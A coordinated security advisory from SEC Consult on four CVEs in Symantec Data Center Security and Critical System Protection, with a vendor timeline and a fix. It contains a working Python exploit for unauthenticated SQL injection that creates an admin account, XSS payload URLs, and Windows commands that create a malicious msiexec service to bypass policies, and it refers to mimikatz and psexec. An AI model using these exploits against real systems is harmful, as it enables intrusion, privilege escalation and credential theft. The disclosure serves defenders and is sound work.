SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https:// <host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https:// <host>:8081/webui/Khaki_docs/SSO-Error.jsp
https:// <host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.
Affected script:
https:// <host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https:// example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https:// example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https:// example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
www.symantec.com/security_response/securityupdates/detail.jsp
www.symantec.com/business/support/index
www.symantec.com/business/support/index
Workaround:
-----------
See solution.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015